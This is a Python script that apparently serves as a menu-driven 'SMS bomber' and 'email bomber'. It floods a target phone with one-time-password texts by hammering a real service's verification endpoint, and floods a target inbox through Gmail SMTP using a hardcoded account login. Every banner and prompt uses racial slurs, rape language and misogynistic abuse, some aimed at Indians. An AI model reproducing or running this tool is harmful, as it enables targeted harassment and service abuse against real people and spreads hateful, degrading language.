#pip install requests
import sys
import os
from time import sleep

def exit():
      print('\n>>> Exiting...')
      sleep(2)
      sys.exit()

#SMS Bomber------------------------------------------------

def sbomb():
      import sys
      import os
      import requests as rq
      from requests.structures import CaseInsensitiveDict
      from time import sleep

      def exit():
            print('\n>>> Exiting...')
            sleep(2)
            sys.exit()

      def clear():
            if os.name=='nt':
                  os.system('cls')
            else:
                  os.system('clear')

      def banner():
            b='''\33[95m
Rape A Scammers number
      '''
            print(b)

      def bomb():
            number=str(input(">>> [!] Enter Target Number: +88"))
            amount=int(input(">>> [!] Enter Amount Of SMS: "))
            url = "https://toffeelive.com/app/service.php"
            headers = CaseInsensitiveDict()
            headers["Content-Type"] = "application/x-www-form-urlencoded"
            data = "phoneNumber="+number+"&route=auth_verify_mobile_no"
            resp = rq.post(url, headers=headers, data=data)
            for i in range(amount):
                  resp = rq.post(url, headers=headers, data=data)
                  if resp.status_code==200:
                        print(f'>>> [+] {i+88} SMS Sent Successfully')
                  elif resp.status_code==201:
                        print(f'>>> [+] {i+88} SMS Sent Successfully')
            sleep(2)
            input('\n>>> Succesfully raped that indian bitch')
            sleep(2)
            

      while True:
            try:
                  while True:
                                    clear()
                                    banner()
                                    bomb()
                                    return main()
            except KeyboardInterrupt:
                  exit()



#Email Bomber-------------------------------------------------




def ebomb():
      import smtplib
      import os
      import sys
      from time import sleep

      def exit():
            print('\n>>> Exiting...')
            sleep(2)
            sys.exit()

      def clear():
            if os.name=='nt':
                  os.system('cls')
            else:
                  os.system('clear')

      def banner():
            banner='''\33[96m
Send Thigh pics to my discord 
I LOVE YOU bby

      '''
            print(banner)
      def works():
            clear()
            banner()
            print('''Nigger''')
            input('\n>>> Go Back You Little Bitch')



      while True:
            try:
                  while True:
                        clear()
                        banner()
                        print('''Choose a option below:
  1. Use default settings (Not Working bc im stoopid)
  2. Use custom settings(Working bc im smart)''')
                        choice=str(input("\n>>> Enter your choice (1/2): "))
                        if choice in ('1','2'):
                              if choice=='1':
                                    email=str('gdriveman4@gmail.com')
                                    pwd=str('hackology')
                                    clear()
                                    banner()
                                    break
                              if choice=='2':
                                    print("\Turn on less secure apps u monkey\n")
                                    email=str(input('[*] Enter your Email: '))
                                    pwd=str(input("[*] Enter Your PassWord: "))
                                    clear()
                                    banner()
                                    break
                        else:
                              print('>>> Invalid Input')
                              sleep(2)


                  bomb=smtplib.SMTP('smtp.gmail.com','587')
                  bomb.ehlo()
                  bomb.starttls()
                  target=str(input('>>> [*] Enter target email: '))
                  amount=int(input('>>> [*] Enter amount of mail: '))
                  subject='Niggaa'
                  body="""Discord @SoldMyChildForDildo#9183"""

                  msg=f'Subject: {subject}\n\n{body}'
                  bomb.login(email,pwd)
                  for i in range(amount):
                        bomb.sendmail(email,target,msg)
                        print(f'>>> [+] {i+1} Fucking that bitchs email')
                        if i+1==amount:
                              sleep(2)
                              input('>>> Succesfully Fucked that bitch \n>>> Press enter to exit... ')
                              return main()
            except KeyboardInterrupt:
                  exit()


def main():
      while True:
            try:
                  def exit():
                        print('\n\33[93m>>> Leaving Aliens Raper')
                        sleep(2)
                        sys.exit()

                  def clear():
                        if os.name=='nt':
                              os.system('cls')
                        else:
                              os.system('clear')

                  def banner():


                        banner='''\33[94m



IG@Keqkt
DISCORD@SoldMyChildForDildo#9183
ALIEN HAS A HUGE COCK
                  \n>>> Alien has 11 inch pp
                        '''
                        print(banner)
                  def menu():
                        menu='''\33[93m Choose a option below:

  [1]. Rape an indian phone
  [2]. Fuck an email
  [3]. Exit like a little slut'''
                        print(menu)

                  clear()
                  banner()
                  menu()
                  choice=str(input('\n\33[92m>>> Enter your choice (1/2/3): '))
                  if choice in ('1','2','3'):
                        if choice=='1':
                              sbomb()
                        elif choice=='2':
                              ebomb()
                        elif choice=='3':
                              exit()
                  else:
                        print('\n>>> Invalid Input')
                        sleep(2)


            except KeyboardInterrupt:
                  exit()



if __name__=='__main__':
      main()
